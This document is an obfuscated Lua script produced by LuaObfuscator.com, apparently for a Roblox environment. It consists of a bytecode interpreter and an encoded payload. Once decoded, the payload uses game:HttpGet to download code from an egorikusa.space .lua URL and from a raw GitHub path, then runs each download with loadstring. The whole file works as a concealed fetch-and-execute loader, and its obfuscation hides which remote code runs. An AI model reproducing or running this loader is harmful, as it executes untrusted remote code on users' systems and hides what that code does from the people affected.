--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v115=v5(v88,v19);v19=nil;return v115;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(1 + 0)) -(v32-(2 -1))) + ((7132 -5494) -((1640 -(32 + 85)) + 114)))) ;return v89-(v89%(1 + 0 + 0 + 0)) ;else local v90=(621 -(555 + 64))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and (1066 -(68 + 997))) or (931 -(857 + 74)) ;end end local function v21() local v34=0;local v35;while true do if (v34==(958 -(892 + 65))) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + ((3 -1) -1) ;v34=1 -(350 -(87 + 263)) ;end end end local function v22() local v36=180 -(67 + 113) ;local v37;local v38;while true do if (v36==1) then return (v38 * (188 + 68)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;v36=(998 -(915 + 82)) + 0 ;end end end local function v23() local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * (29809750 -13032534)) + (v42 * (86188 -20652)) + (v41 * (1443 -(1069 + 118))) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (6 -3) );v18=v18 + 1 + 3 ;v39=1;end end end local function v24() local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(3 + 0)) then if (v49==(791 -((1253 -(261 + 624)) + 423))) then if (v48==(0 -0)) then return v50 * (18 -(10 + 8)) ;else local v131=0;while true do if ((0 -0)==v131) then v49=1;v47=442 -(416 + 26) ;break;end end end elseif (v49==(3637 -1590)) then return ((v48==0) and (v50 * ((3 -2)/(0 + 0)))) or (v50 * NaN) ;end return v8(v50,v49-((2889 -(1020 + 60)) -786) ) * (v47 + (v48/(2^(490 -(145 + 293))))) ;end if (v44==1) then v47=431 -(44 + 386) ;v48=(v20(v46,1487 -(998 + 488) ,7 + 13 ) * ((2 + 0)^(804 -(201 + 571)))) + v45 ;v44=2;end if ((1138 -(116 + 1022))==v44) then v45=v23();v46=v23();v44=(1427 -(630 + 793)) -3 ;end if ((2 + 0)==v44) then v49=v20(v46,76 -(186 -131) ,(520 -410) -79 );v50=((v20(v46,891 -(814 + 45) )==((1 + 1) -1)) and  -(1 + 0)) or 1 ;v44=2 + 1 ;end end end local function v25(v51) local v52=0;local v53;local v54;while true do if (v52==(3 -2)) then v53=v3(v16,v18,(v18 + v51) -(1748 -((1815 -(87 + 968)) + 987)) );v18=v18 + v51 ;v52=1915 -((7874 -6085) + 113 + 11) ;end if (v52==(768 -(745 + (47 -26)))) then v54={};for v116=1, #v53 do v54[v116]=v2(v1(v3(v53,v116,v116)));end v52=2 + 1 ;end if ((7 -4)==v52) then return v6(v54);end if (v52==(0 -0)) then v53=nil;if  not v51 then local v122=0;while true do if (v122==((1413 -(447 + 966)) + 0)) then v51=v23();if (v51==0) then return "";end break;end end end v52=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==0) then local v123=(function() return 0;end)();local v124=(function() return;end)();while true do if (v123==0) then v124=(function() return 241 -(187 + 54) ;end)();while true do if (v124~=0) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v124=(function() return 781 -(162 + 618) ;end)();end if (v124==(1252 -(721 + 530))) then v91=(function() return  #"]";end)();break;end end break;end end end if (v91~= #"~") then else if (v92== #"~") then v94=(function() return v93()~=0 ;end)();elseif (v92==2) then v94=(function() return v95();end)();elseif (v92== #"19(") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v56=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==(1271 -(945 + 326))) then local v126=(function() return 0 + 0 ;end)();while true do if (v126==(1 -0)) then v108=(function() return 1;end)();break;end if (v126~=(0 -0)) then else v99=(function() return 0 + 0 ;end)();v100=(function() return nil;end)();v126=(function() return 701 -(271 + 429) ;end)();end end end if (v108~=(1637 -(1373 + 263))) then else local v127=(function() return 1000 -(451 + 549) ;end)();while true do if ((0 + 0)==v127) then while true do if (v99==(0 -0)) then v100=(function() return v101();end)();if (v102(v100, #"/", #"}")==(0 -0)) then local v133=(function() return 0;end)();local v134=(function() return;end)();local v135=(function() return;end)();local v136=(function() return;end)();local v137=(function() return;end)();while true do if (v133==(1289 -(993 + 295))) then v136=(function() return nil;end)();v137=(function() return nil;end)();v133=(function() return 1386 -(746 + 638) ;end)();end if (v133==(1173 -(418 + 753))) then while true do if (v134==0) then local v189=(function() return 0;end)();local v190=(function() return;end)();while true do if ((0 + 0)==v189) then v190=(function() return 0;end)();while true do if (v190==1) then v134=(function() return  #" ";end)();break;end if (v190==(0 + 0)) then v135=(function() return v102(v100,1 + 1 , #"-19");end)();v136=(function() return v102(v100, #".com",8 -2 );end)();v190=(function() return 1;end)();end end break;end end end if (v134~= #"xnx") then else if (v102(v136, #"91(", #"91(")~= #"{") then else v137[ #"http"]=(function() return v103[v137[ #"0313"]];end)();end v104[v105]=(function() return v137;end)();break;end if (v134==2) then local v192=(function() return 341 -(218 + 123) ;end)();local v193=(function() return;end)();while true do if (v192==(1581 -(1535 + 46))) then v193=(function() return 0 + 0 ;end)();while true do if (v193==1) then v134=(function() return  #"gha";end)();break;end if (v193==(529 -(406 + 123))) then if (v102(v136, #">", #"\\")== #"\\") then v137[2]=(function() return v103[v137[1 + 1 ]];end)();end if (v102(v136,2,2)== #" ") then v137[ #"91("]=(function() return v103[v137[ #"-19"]];end)();end v193=(function() return 1770 -(1749 + 20) ;end)();end end break;end end end if (v134== #",") then local v194=(function() return 560 -(306 + 254) ;end)();while true do if (1==v194) then v134=(function() return 2;end)();break;end if (v194~=0) then else v137=(function() return {v106(),v106(),nil,nil};end)();if (v135==0) then local v200=(function() return 0;end)();local v201=(function() return;end)();while true do if ((1322 -(1249 + 73))==v200) then v201=(function() return 0 -0 ;end)();while true do if (v201~=(1467 -(899 + 568))) then else v137[ #"xnx"]=(function() return v106();end)();v137[ #"http"]=(function() return v106();end)();break;end end break;end end elseif (v135== #".") then v137[ #"gha"]=(function() return v107();end)();elseif (v135==2) then v137[ #"nil"]=(function() return v107() -(2^(1161 -(466 + 679))) ;end)();elseif (v135== #"91(") then local v208=(function() return 0 + 0 ;end)();local v209=(function() return;end)();while true do if (v208==(0 -0)) then v209=(function() return 0;end)();while true do if (v209==(0 -0)) then v137[ #"gha"]=(function() return v107() -((1902 -(106 + 1794))^(6 + 10)) ;end)();v137[ #"asd1"]=(function() return v106();end)();break;end end break;end end end v194=(function() return 1;end)();end end end end break;end if (v133==(603 -(268 + 335))) then local v176=(function() return 0 -0 ;end)();while true do if (v176~=(2 -1)) then else v133=(function() return 291 -(60 + 230) ;end)();break;end if (v176~=(572 -(426 + 146))) then else v134=(function() return 0;end)();v135=(function() return nil;end)();v176=(function() return 1 + 0 ;end)();end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end;end)();local v57=(function() return function(v109,v110,v111) local v112=(function() return 1456 -(282 + 1174) ;end)();while true do if (v112~=0) then else local v128=(function() return 811 -(569 + 242) ;end)();while true do if (v128~=(1427 -(41 + 1386))) then else v109[v110-#"|" ]=(function() return v111();end)();return v109,v110,v111;end end end end end;end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {};end)();local v61=(function() return {v58,v59,nil,v60};end)();local v62=(function() return v23();end)();local v63=(function() return {};end)();for v71= #".",v62 do FlatIdent_8F59B,Type,v21,Cons,v24,v25,v63,v71=(function() return v55(FlatIdent_8F59B,Type,v21,Cons,v24,v25,v63,v71);end)();end v61[ #"gha"]=(function() return v21();end)();for v72= #">",v23() do FlatIdent_8CEDF,Descriptor,v21,v20,v63,v58,v72,v22,v23=(function() return v56(FlatIdent_8CEDF,Descriptor,v21,v20,v63,v58,v72,v22,v23);end)();end for v73= #"|",v23() do v59,v73,v28=(function() return v57(v59,v73,v28);end)();end return v61;end local function v29(v65,v66,v67) local v68=v65[1];local v69=v65[2 + 0 ];local v70=v65[106 -(17 + 86) ];return function(...) local v74=v68;local v75=v69;local v76=v70;local v77=v27;local v78=1 + 0 ;local v79= -(1 -0);local v80={};local v81={...};local v82=v12("#",...) -1 ;local v83={};local v84={};for v113=166 -(122 + 44) ,v82 do if (v113>=v76) then v80[v113-v76 ]=v81[v113 + (1 -0) ];else v84[v113]=v81[v113 + (3 -2) ];end end local v85=(v82-v76) + 1 + 0 ;local v86;local v87;while true do local v114=0 + 0 ;while true do if (((0 + 0) -0)==v114) then v86=v74[v78];v87=v86[66 -((42 -12) + 35) ];v114=1 + 0 ;end if ((1258 -(1043 + 214))==v114) then if (v87<=(1943 -(565 + 1368))) then if ((4715==4715) and (v87<=(15 -11))) then if ((4218==4218) and (v87<=((716 + 497) -(323 + 889)))) then if ((v87>(0 -(163 -(92 + 71)))) or (221<89)) then v84[v86[5 -3 ]]=v67[v86[(2 + 1) -0 ]];else v84[v86[2 + 0 ]]();end elseif ((2054>=1421) and (v87<=((977 -395) -(361 + 219)))) then for v150=v86[2 -0 ],v86[323 -(53 + (1032 -(574 + 191))) ] do v84[v150]=nil;end elseif ((692<3058) and (v87>(1 + 2 + 0))) then if (v84[v86[415 -(15 + 398) ]]==v86[986 -(18 + 964) ]) then v78=v78 + (3 -(4 -2)) ;else v78=v86[2 + 1 + 0 ];end else for v177=v86[2 + 0 ],v86[853 -(20 + 830) ] do v84[v177]=nil;end end elseif (v87<=(6 + 1)) then if ((v87<=(4 + 1)) or (3254==1655)) then v78=v86[129 -((965 -(254 + 595)) + 10) ];elseif (v87==(1 + (131 -(55 + 71)))) then v84[v86[740 -(542 + 196) ]]=v86[6 -3 ];else local v157=v86[1 + 1 ];v84[v157]=v84[v157](v13(v84,v157 + (1 -0) ,v79));end elseif (v87<=8) then local v141=v86[1094 -(975 + 117) ];local v142,v143=v77(v84[v141](v13(v84,v141 + 1 + 0 ,v86[2 + 1 ])));v79=(v143 + v141) -(2 -1) ;local v144=0 -0 ;for v152=v141,v79 do v144=v144 + (1552 -(1126 + 425)) ;v84[v152]=v142[v144];end elseif ((v87>(30 -21)) or (1296==4910)) then local v159=v86[407 -(118 + 287) ];local v160=v84[v86[7 -4 ]];v84[v159 + ((1 -0) -0) ]=v160;v84[v159]=v160[v86[15 -11 ]];else local v164=0 + 0 ;local v165;local v166;local v167;local v168;while true do if ((1122 -(118 + 1003))==v164) then v79=(v167 + v165) -(2 -1) ;v168=(3017 -(573 + 1217)) -(322 + 905) ;v164=379 -(142 + (650 -415)) ;end if (v164==(0 -0)) then v165=v86[1 + 1 ];v166,v167=v77(v84[v165](v13(v84,v165 + 1 ,v86[980 -(553 + 33 + 391) ])));v164=1 -0 ;end if (v164==(949 -(245 + 702))) then for v195=v165,v79 do local v196=0 + 0 ;while true do if ((3368==3368) and (v196==(0 + 0))) then v168=v168 + (1899 -(260 + 1638)) ;v84[v195]=v166[v168];break;end end end break;end end end elseif ((2643<3815) and (v87<=(9 + 6))) then if ((1913>493) and (v87<=(6 + 6))) then if ((4755>3428) and (v87>(7 + 4))) then local v145=0 -0 ;local v146;local v147;while true do if (v145==((0 -0) -0)) then v146=v86[(943 -(714 + 225)) -2 ];v147=v84[v86[1 + 2 ]];v145=4 -(8 -5) ;end if (v145==((2 -0) -(1 + 0))) then v84[v146 + 1 ]=v147;v84[v146]=v147[v86[1 + 3 ]];break;end end else v84[v86[755 -(239 + 514) ]]();end elseif (v87<=(1703 -(1121 + 569))) then do return;end elseif (v87==(5 + 9)) then v78=v86[1332 -(797 + 532) ];else v84[v86[685 -(483 + (289 -89)) ]]=v86[3 + 0 ];end elseif (v87<=(7 + (817 -(118 + 688)))) then if (v87<=(37 -21)) then local v148=0;local v149;while true do if ((1381<=2369) and (v148==(1202 -(373 + 829)))) then v149=v86[767 -(468 + 297) ];v84[v149]=v84[v149](v13(v84,v149 + (563 -(334 + 228)) ,v79));break;end end elseif (v87>(748 -(476 + 255))) then v84[v86[4 -2 ]]=v67[v86[5 -2 ]];else v84[v86[1132 -(369 + 761) ]]=v86[3]~=(0 + 0) ;end elseif (v87<=(34 -15)) then do return;end elseif ((v87==(20 + 0)) or (4843==4084)) then v84[v86[4 -2 ]]=v86[5 -2 ]~=(238 -(64 + 174)) ;elseif (v84[v86[1 + 1 ]]==v86[5 -1 ]) then v78=v78 + (337 -(144 + 192)) ;else v78=v86[219 -(42 + 174) ];end v78=v78 + (49 -(25 + 23)) + 0 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F65676F72696B7573612E73706163652F6337623062633832386435323738323666633332353765662E6C7561033D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F536C61646B79707570732O672F336234632F6D61696E2F34633362001C3O0012063O00014O0003000100013O0026043O0002000100010004053O00020001001206000100013O00260400010005000100010004053O00050001001201000200023O001201000300033O00200A000300030004001206000500054O0011000600014O0009000300064O000700023O00022O000B000200010001001201000200023O001201000300033O00200A000300030004001206000500064O0011000600014O0009000300064O000700023O00022O000B0002000100010004053O001B00010004053O000500010004053O001B00010004053O000200012O00133O00017O00",v9(),...);